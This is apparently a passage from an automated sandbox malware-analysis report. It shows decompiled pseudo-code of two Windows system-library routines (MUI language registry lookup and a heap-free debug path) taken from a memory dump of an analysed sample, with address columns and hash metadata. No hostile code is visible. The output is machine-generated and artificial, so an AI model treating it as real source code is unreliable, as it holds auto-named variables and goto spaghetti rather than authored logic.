				char* _t134;
				void* _t155;
				char* _t170;
				char _t171;
				void* _t176;
				signed int _t181;
				void* _t184;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t200;

				_t200 = (_t198 & 0xfffffff8) - 0x74;
				_t170 = _a12;
				_v100 = __ecx;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t190 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t170 == 0 || _a16 == 0) {
					_t194 = 0xc000000d;
					goto L23;
				} else {
					_t196 = _a4;
					 *_t170 = 0;
					if(_t196 == 1 || _t196 == 0) {
						E33D35050(0,  &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v80 = 0;
						_push( &_v84);
						_push(0x20019);
						_v72 = 0x40;
						_push( &_v112);
						_v68 = 0;
						_v64 = 0;
						if(L33D32AB0() >= 0) {
							_t124 = E33CE7220(_v104, _v100,  &_v116);
							_t190 = _v128;
							_t194 = _t124;
							if(_t194 != 0 || _t190 == 0) {
								_t181 = _v104;
								_t196 = _a4;
								goto L7;
							} else {
								goto L24;
							}
						} else {
							_t181 = 0;
							_v104 = 0;
							L7:
							if(_t196 == 1 && _t181 != 0) {
								_t187 =  &_v117;
								if(L33DAAD61(_t181,  &_v117) >= 0) {
									asm("sbb eax, eax");
									_a4 = _t196 &  ~(_v117 - 0x00000001 & 0x000000ff);
								}
							}
							_t194 = E33CED736(0x2000000,  &_v108);
							if(_t194 < 0) {
								L51:
								 *_t170 = 1;
								goto L23;
							} else {
								if(_a4 != 1) {
									E33D35050(0x2000000,  &_v84, L"Control Panel\\Desktop\\MuiCached");
									_t194 = 0;
									_v32 = _v116;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v36 = 0x18;
									_push( &_v120);
									_v24 = 0x40;
									_v20 = 0;
									 *((intOrPtr*)(_t200 + 0x88)) = 0;
									if(L33D32AB0() < 0) {
										 *_t170 = 1;
										L24:
										_t176 = 0;
										L25:
										_t112 = _a4;
										if(_a4 != 0 || _t190 != 0 &&  *((intOrPtr*)(_t190 + 4)) != _t176) {
											_t173 = _v100;
											L29:
											if(_t190 == 0) {
												_t190 = E33D13262(1, _t187 & 0xffffff00 | _t112 != 0x00000001, _t173);
												if(_t190 == 0) {
													_t194 = 0xc0000017;
												}
											}
											goto L31;
										} else {
											_t173 = _v100;
											_t116 = E33DABD08(_v100, _t187, _t170,  &_v116);
											_t190 = _v124;
											_t194 = _t116;
											if(_t194 != 0) {
												L31:
												 *_a16 = _t190;
												L32:
												_t105 = _v88;
												if(_v88 == 0) {
													L43:
													_t171 = 0;
													goto L34;
												} else {
													_t171 = 0;
													E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t105);
													L34:
													if(_v112 != 0) {
														_push(_v112);
														L33D32A80();
														_v116 = _t171;
													}
													if(_v108 != 0) {
														_push(_v108);
														L33D32A80();
														_v112 = _t171;
													}
													if(_v104 != 0) {
														_push(_v104);
														L33D32A80();
													}
													goto L39;
												}
											}
											_t112 = _a4;
											goto L29;
										}
									}
									_t134 = L"MachinePreferredUILanguages";
									L15:
									E33D35050(0x2000000,  &_v84, _t134);
									_push(0x2000000);
									_t187 =  &_v92;
									_t184 = E33CED64A(_v120,  &_v92,  &_v104, _t194,  &_v100);
									_t194 = 0xc0000034;
									if(_t184 == 0xc0000034) {
										L42:
										_t176 = 0;
										 *_t170 = 1;
										_t194 = 0;
										goto L25;
									}
									_t140 = _v96;
									if(_v96 == 0) {
										goto L42;
									}
									if(_t184 != 0x80000005) {
										goto L43;
									}
									_t192 = E33D05D90(_t184,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t140 + 2);
									_v104 = _t192;
									if(_t192 == 0) {
										_t194 = 0xc0000017;
										goto L43;
									}
									_push(_t184);
									_t187 =  &_v88;
									_t194 = E33CED64A(_v116,  &_v88,  &_v100, _t192,  &_v96);
									if(_t194 < 0) {
										L22:
										_t190 = _v124;
										L23:
										if(_t194 != 0) {
											goto L32;
										}
										goto L24;
									}
									if(_v104 != 7) {
										if(_v104 == 1) {
											goto L21;
										}
										_t190 = _v124;
										_t176 = 0;
										_t194 = 0;
										 *_t170 = 1;
										goto L25;
									}
									L21:
									_t187 = _t192;
									_t194 = L33D14CA6(_v108, _t192, _v100 >> 1, 8, (0 | _a4 != 0x00000001) + 2, "true",  &_v124);
									goto L22;
								}
								_t155 = E33CED8D0(0x2000000, _v108, _v100,  &_v116);
								_t190 = _v128;
								_t194 = _t155;
								if(_t194 == 0) {
									if(_t190 != 0) {
										goto L31;
									}
								}
								E33D35050(0x2000000,  &_v84, L"Control Panel\\Desktop");
								_v56 = _v116;
								 *((intOrPtr*)(_t200 + 0x58)) =  &_v92;
								 *((intOrPtr*)(_t200 + 0x60)) = 0;
								_v40 = 0;
								_push( &_v60);
								_push(0x20019);
								_v60 = 0x18;
								_push( &_v120);
								 *((intOrPtr*)(_t200 + 0x68)) = 0x40;
								_t194 = L33D32AB0();
								if(_t194 < 0) {
									goto L51;
								}
								_t134 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t134 = L"PreferredUILanguagesPending";
								}
								_t194 = 0;
								goto L15;
							}
						}
					} else {
						_t194 = 0xc000000d;
						L39:
						return _t194;
					}
				}
			}


















































                                                                                                                                                                                            0x33ced2f4
                                                                                                                                                                                            0x33ced2f8
                                                                                                                                                                                            0x33ced2ff
                                                                                                                                                                                            0x33ced303
                                                                                                                                                                                            0x33ced307
                                                                                                                                                                                            0x33ced30b
                                                                                                                                                                                            0x33ced30f
                                                                                                                                                                                            0x33ced317
                                                                                                                                                                                            0x33ced31b
                                                                                                                                                                                            0x33ced31f
                                                                                                                                                                                            0x33ced325
                                                                                                                                                                                            0x33ced327
                                                                                                                                                                                            0x33ced32d
                                                                                                                                                                                            0x33d4a69c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced344
                                                                                                                                                                                            0x33ced344
                                                                                                                                                                                            0x33ced347
                                                                                                                                                                                            0x33ced34c
                                                                                                                                                                                            0x33ced360
                                                                                                                                                                                            0x33ced369
                                                                                                                                                                                            0x33ced371
                                                                                                                                                                                            0x33ced37b
                                                                                                                                                                                            0x33ced37f
                                                                                                                                                                                            0x33ced380
                                                                                                                                                                                            0x33ced389
                                                                                                                                                                                            0x33ced391
                                                                                                                                                                                            0x33ced392
                                                                                                                                                                                            0x33ced396
                                                                                                                                                                                            0x33ced3a1
                                                                                                                                                                                            0x33d4a60d
                                                                                                                                                                                            0x33d4a612
                                                                                                                                                                                            0x33d4a616
                                                                                                                                                                                            0x33d4a61a
                                                                                                                                                                                            0x33d4a624
                                                                                                                                                                                            0x33d4a628
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced3a7
                                                                                                                                                                                            0x33ced3a7
                                                                                                                                                                                            0x33ced3a9
                                                                                                                                                                                            0x33ced3ad
                                                                                                                                                                                            0x33ced3b0
                                                                                                                                                                                            0x33d4a630
                                                                                                                                                                                            0x33d4a63b
                                                                                                                                                                                            0x33d4a64c
                                                                                                                                                                                            0x33d4a650
                                                                                                                                                                                            0x33d4a650
                                                                                                                                                                                            0x33d4a63b
                                                                                                                                                                                            0x33ced3c9
                                                                                                                                                                                            0x33ced3cd
                                                                                                                                                                                            0x33d4a658
                                                                                                                                                                                            0x33d4a658
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced3d3
                                                                                                                                                                                            0x33ced3d7
                                                                                                                                                                                            0x33ced5d5
                                                                                                                                                                                            0x33ced5de
                                                                                                                                                                                            0x33ced5e0
                                                                                                                                                                                            0x33ced5e8
                                                                                                                                                                                            0x33ced5f0
                                                                                                                                                                                            0x33ced5f1
                                                                                                                                                                                            0x33ced5fa
                                                                                                                                                                                            0x33ced602
                                                                                                                                                                                            0x33ced603
                                                                                                                                                                                            0x33ced60e
                                                                                                                                                                                            0x33ced615
                                                                                                                                                                                            0x33ced623
                                                                                                                                                                                            0x33ced642
                                                                                                                                                                                            0x33ced52e
                                                                                                                                                                                            0x33ced52e
                                                                                                                                                                                            0x33ced530
                                                                                                                                                                                            0x33ced530
                                                                                                                                                                                            0x33ced535
                                                                                                                                                                                            0x33ced549
                                                                                                                                                                                            0x33ced54d
                                                                                                                                                                                            0x33ced54f
                                                                                                                                                                                            0x33ced560
                                                                                                                                                                                            0x33ced564
                                                                                                                                                                                            0x33d4a6cd
                                                                                                                                                                                            0x33d4a6cd
                                                                                                                                                                                            0x33ced564
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a6a6
                                                                                                                                                                                            0x33d4a6ac
                                                                                                                                                                                            0x33d4a6b2
                                                                                                                                                                                            0x33d4a6b7
                                                                                                                                                                                            0x33d4a6bb
                                                                                                                                                                                            0x33d4a6bf
                                                                                                                                                                                            0x33ced56a
                                                                                                                                                                                            0x33ced56d
                                                                                                                                                                                            0x33ced56f
                                                                                                                                                                                            0x33ced56f
                                                                                                                                                                                            0x33ced575
                                                                                                                                                                                            0x33ced63b
                                                                                                                                                                                            0x33ced63b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced57b
                                                                                                                                                                                            0x33ced582
                                                                                                                                                                                            0x33ced588
                                                                                                                                                                                            0x33ced58d
                                                                                                                                                                                            0x33ced592
                                                                                                                                                                                            0x33ced594
                                                                                                                                                                                            0x33ced598
                                                                                                                                                                                            0x33ced59d
                                                                                                                                                                                            0x33ced59d
                                                                                                                                                                                            0x33ced5a6
                                                                                                                                                                                            0x33ced5a8
                                                                                                                                                                                            0x33ced5ac
                                                                                                                                                                                            0x33ced5b1
                                                                                                                                                                                            0x33ced5b1
                                                                                                                                                                                            0x33ced5ba
                                                                                                                                                                                            0x33d4a6d7
                                                                                                                                                                                            0x33d4a6db
                                                                                                                                                                                            0x33d4a6db
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced5ba
                                                                                                                                                                                            0x33ced575
                                                                                                                                                                                            0x33d4a6c5
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a6c5
                                                                                                                                                                                            0x33ced535
                                                                                                                                                                                            0x33ced625
                                                                                                                                                                                            0x33ced465
                                                                                                                                                                                            0x33ced46b
                                                                                                                                                                                            0x33ced470
                                                                                                                                                                                            0x33ced480
                                                                                                                                                                                            0x33ced489
                                                                                                                                                                                            0x33ced48b
                                                                                                                                                                                            0x33ced492
                                                                                                                                                                                            0x33ced62f
                                                                                                                                                                                            0x33ced62f
                                                                                                                                                                                            0x33ced631
                                                                                                                                                                                            0x33ced634
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced634
                                                                                                                                                                                            0x33ced498
                                                                                                                                                                                            0x33ced49e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced4aa
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced4c4
                                                                                                                                                                                            0x33ced4c6
                                                                                                                                                                                            0x33ced4cc
                                                                                                                                                                                            0x33d4a677
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a677
                                                                                                                                                                                            0x33ced4d2
                                                                                                                                                                                            0x33ced4e2
                                                                                                                                                                                            0x33ced4eb
                                                                                                                                                                                            0x33ced4ef
                                                                                                                                                                                            0x33ced526
                                                                                                                                                                                            0x33ced526
                                                                                                                                                                                            0x33ced52a
                                                                                                                                                                                            0x33ced52c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced52c
                                                                                                                                                                                            0x33ced4f6
                                                                                                                                                                                            0x33d4a686
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a68c
                                                                                                                                                                                            0x33d4a690
                                                                                                                                                                                            0x33d4a692
                                                                                                                                                                                            0x33d4a694
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a694
                                                                                                                                                                                            0x33ced4fc
                                                                                                                                                                                            0x33ced507
                                                                                                                                                                                            0x33ced524
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced524
                                                                                                                                                                                            0x33ced3ea
                                                                                                                                                                                            0x33ced3ef
                                                                                                                                                                                            0x33ced3f3
                                                                                                                                                                                            0x33ced3f7
                                                                                                                                                                                            0x33d4a662
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d4a668
                                                                                                                                                                                            0x33ced407
                                                                                                                                                                                            0x33ced410
                                                                                                                                                                                            0x33ced418
                                                                                                                                                                                            0x33ced41e
                                                                                                                                                                                            0x33ced422
                                                                                                                                                                                            0x33ced42a
                                                                                                                                                                                            0x33ced42b
                                                                                                                                                                                            0x33ced434
                                                                                                                                                                                            0x33ced43c
                                                                                                                                                                                            0x33ced43d
                                                                                                                                                                                            0x33ced44a
                                                                                                                                                                                            0x33ced44e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced458
                                                                                                                                                                                            0x33ced45d
                                                                                                                                                                                            0x33d4a66d
                                                                                                                                                                                            0x33d4a66d
                                                                                                                                                                                            0x33ced463
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33ced463
                                                                                                                                                                                            0x33ced3cd
                                                                                                                                                                                            0x33d4a5f6
                                                                                                                                                                                            0x33d4a5f6
                                                                                                                                                                                            0x33ced5c0
                                                                                                                                                                                            0x33ced5c8
                                                                                                                                                                                            0x33ced5c8
                                                                                                                                                                                            0x33ced34c

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                            • API String ID: 0-3532704233
                                                                                                                                                                                            • Opcode ID: 92547eac3b984608ebc415a4cf96302646525ba3c0d0d131531d13f72bbf7c88
                                                                                                                                                                                            • Instruction ID: 327198cca68eab2db314f49ce4c8a8042b5e71944d373a92e7229d30ea7e7afb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 92547eac3b984608ebc415a4cf96302646525ba3c0d0d131531d13f72bbf7c88
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CB1BBB29093419FD711DF24C8A4A5FBBE8BF88755F05492EF899D7200DB70D948CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D9F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                            			E33D9F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x33dcd2f8);
				E33D47BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E33CE7662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E33D9FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E33CFFED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					L33DA0835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E33CE753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x33de47d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E33D03BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								L33DA0D24( *((intOrPtr*)(_t165 - 0x30)));
								L33DA0835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x33de47d4;
							if( *0x33de47d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E33DAD646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E33D23AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x33de47d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x33de47d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E33CEB910();
								} else {
									E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E33D9823A(_t162,  *(_t165 - 0x20)));
								E33CEB910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x33de47a1 = 1;
									 *0x33de4100 = 0;
									asm("int3");
									 *0x33de47a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E33CEB910("About to free block at %p\n",  *0x33de47d0);
						goto L30;
					}
				} else {
					_t164 =  *0x33de3750; // 0x0
					 *0x33de91e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}























                                                                                                                                                                                            0x33d9f8f8
                                                                                                                                                                                            0x33d9f8fa
                                                                                                                                                                                            0x33d9f8ff
                                                                                                                                                                                            0x33d9f906
                                                                                                                                                                                            0x33d9f909
                                                                                                                                                                                            0x33d9f90b
                                                                                                                                                                                            0x33d9f910
                                                                                                                                                                                            0x33d9f912
                                                                                                                                                                                            0x33d9f915
                                                                                                                                                                                            0x33d9f91f
                                                                                                                                                                                            0x33d9f93e
                                                                                                                                                                                            0x33d9f941
                                                                                                                                                                                            0x33d9f94f
                                                                                                                                                                                            0x33d9f954
                                                                                                                                                                                            0x33d9f956
                                                                                                                                                                                            0x33d9fb8c
                                                                                                                                                                                            0x33d9fb8e
                                                                                                                                                                                            0x33d9fb91
                                                                                                                                                                                            0x33d9fb91
                                                                                                                                                                                            0x33d9fb94
                                                                                                                                                                                            0x33d9fb9b
                                                                                                                                                                                            0x33d9fba0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fba0
                                                                                                                                                                                            0x33d9f95f
                                                                                                                                                                                            0x33d9f962
                                                                                                                                                                                            0x33d9f96c
                                                                                                                                                                                            0x33d9f96f
                                                                                                                                                                                            0x33d9f972
                                                                                                                                                                                            0x33d9f97a
                                                                                                                                                                                            0x33d9f97f
                                                                                                                                                                                            0x33d9f986
                                                                                                                                                                                            0x33d9f986
                                                                                                                                                                                            0x33d9f98b
                                                                                                                                                                                            0x33d9f98b
                                                                                                                                                                                            0x33d9f992
                                                                                                                                                                                            0x33d9f99a
                                                                                                                                                                                            0x33d9f99d
                                                                                                                                                                                            0x33d9f9a1
                                                                                                                                                                                            0x33d9f9aa
                                                                                                                                                                                            0x33d9f9aa
                                                                                                                                                                                            0x33d9f9aa
                                                                                                                                                                                            0x33d9f9ac
                                                                                                                                                                                            0x33d9f9af
                                                                                                                                                                                            0x33d9f9b7
                                                                                                                                                                                            0x33d9f9b9
                                                                                                                                                                                            0x33d9f9be
                                                                                                                                                                                            0x33d9f9c0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9f9c6
                                                                                                                                                                                            0x33d9f9c9
                                                                                                                                                                                            0x33d9f9cf
                                                                                                                                                                                            0x33d9f9d5
                                                                                                                                                                                            0x33d9fa1b
                                                                                                                                                                                            0x33d9fa1e
                                                                                                                                                                                            0x33d9fa21
                                                                                                                                                                                            0x33d9fa26
                                                                                                                                                                                            0x33d9fb2b
                                                                                                                                                                                            0x33d9fb37
                                                                                                                                                                                            0x33d9fb39
                                                                                                                                                                                            0x33d9fb41
                                                                                                                                                                                            0x33d9fb4b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fb4b
                                                                                                                                                                                            0x33d9fa2c
                                                                                                                                                                                            0x33d9fa33
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fa39
                                                                                                                                                                                            0x33d9fa3c
                                                                                                                                                                                            0x33d9fa3f
                                                                                                                                                                                            0x33d9fa42
                                                                                                                                                                                            0x33d9fa47
                                                                                                                                                                                            0x33d9fa49
                                                                                                                                                                                            0x33d9fa4c
                                                                                                                                                                                            0x33d9fa51
                                                                                                                                                                                            0x33d9fa54
                                                                                                                                                                                            0x33d9fa56
                                                                                                                                                                                            0x33d9fa5b
                                                                                                                                                                                            0x33d9fa60
                                                                                                                                                                                            0x33d9fa60
                                                                                                                                                                                            0x33d9fa54
                                                                                                                                                                                            0x33d9fa63
                                                                                                                                                                                            0x33d9fa67
                                                                                                                                                                                            0x33d9fa79
                                                                                                                                                                                            0x33d9fa7c
                                                                                                                                                                                            0x33d9fa7f
                                                                                                                                                                                            0x33d9fa69
                                                                                                                                                                                            0x33d9fa6b
                                                                                                                                                                                            0x33d9fa70
                                                                                                                                                                                            0x33d9fa73
                                                                                                                                                                                            0x33d9fa73
                                                                                                                                                                                            0x33d9fa82
                                                                                                                                                                                            0x33d9fa84
                                                                                                                                                                                            0x33d9fa88
                                                                                                                                                                                            0x33d9fa8b
                                                                                                                                                                                            0x33d9fa8d
                                                                                                                                                                                            0x33d9fa90
                                                                                                                                                                                            0x33d9fa95
                                                                                                                                                                                            0x33d9fa9b
                                                                                                                                                                                            0x33d9fa9b
                                                                                                                                                                                            0x33d9fa9b
                                                                                                                                                                                            0x33d9fa9d
                                                                                                                                                                                            0x33d9faa0
                                                                                                                                                                                            0x33d9faa6
                                                                                                                                                                                            0x33d9faad
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fab3
                                                                                                                                                                                            0x33d9faba
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fabc
                                                                                                                                                                                            0x33d9fac2
                                                                                                                                                                                            0x33d9fac5
                                                                                                                                                                                            0x33d9fae4
                                                                                                                                                                                            0x33d9fae9
                                                                                                                                                                                            0x33d9fac7
                                                                                                                                                                                            0x33d9fadc
                                                                                                                                                                                            0x33d9fae1
                                                                                                                                                                                            0x33d9fafa
                                                                                                                                                                                            0x33d9fb03
                                                                                                                                                                                            0x33d9fb0b
                                                                                                                                                                                            0x33d9fb0b
                                                                                                                                                                                            0x33d9fb11
                                                                                                                                                                                            0x33d9fb15
                                                                                                                                                                                            0x33d9fb17
                                                                                                                                                                                            0x33d9fb1e
                                                                                                                                                                                            0x33d9fb24
                                                                                                                                                                                            0x33d9fb25
                                                                                                                                                                                            0x33d9fb25
                                                                                                                                                                                            0x33d9fb15
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9faa0
                                                                                                                                                                                            0x33d9f9d7
                                                                                                                                                                                            0x33d9f9da
                                                                                                                                                                                            0x33d9f9f9
                                                                                                                                                                                            0x33d9f9fe
                                                                                                                                                                                            0x33d9f9dc
                                                                                                                                                                                            0x33d9f9f1
                                                                                                                                                                                            0x33d9f9f6
                                                                                                                                                                                            0x33d9fa0f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9fa15
                                                                                                                                                                                            0x33d9f921
                                                                                                                                                                                            0x33d9f926
                                                                                                                                                                                            0x33d9f92e
                                                                                                                                                                                            0x33d9f936
                                                                                                                                                                                            0x33d9fba2
                                                                                                                                                                                            0x33d9fba5
                                                                                                                                                                                            0x33d9fbb1
                                                                                                                                                                                            0x33d9fbb1

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                            • API String ID: 3446177414-3492000579
                                                                                                                                                                                            • Opcode ID: fa27e25df7e2e571eb0a42bf3c5a5326b70784dbbc06cbf308b2b4092bedb243
                                                                                                                                                                                            • Instruction ID: 5009336cee0f5721244b5e8369c4bf9bea5f4badd41052e5f5ed7903cb715403
                                                                                                                                                                                            • Opcode Fuzzy Hash: fa27e25df7e2e571eb0a42bf3c5a5326b70784dbbc06cbf308b2b4092bedb243
                                                                                                                                                                                            • Instruction Fuzzy Hash: 97711176901744EFDB02EF68C4506EDFBF9FF49705F088159E494AB652CB349981CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

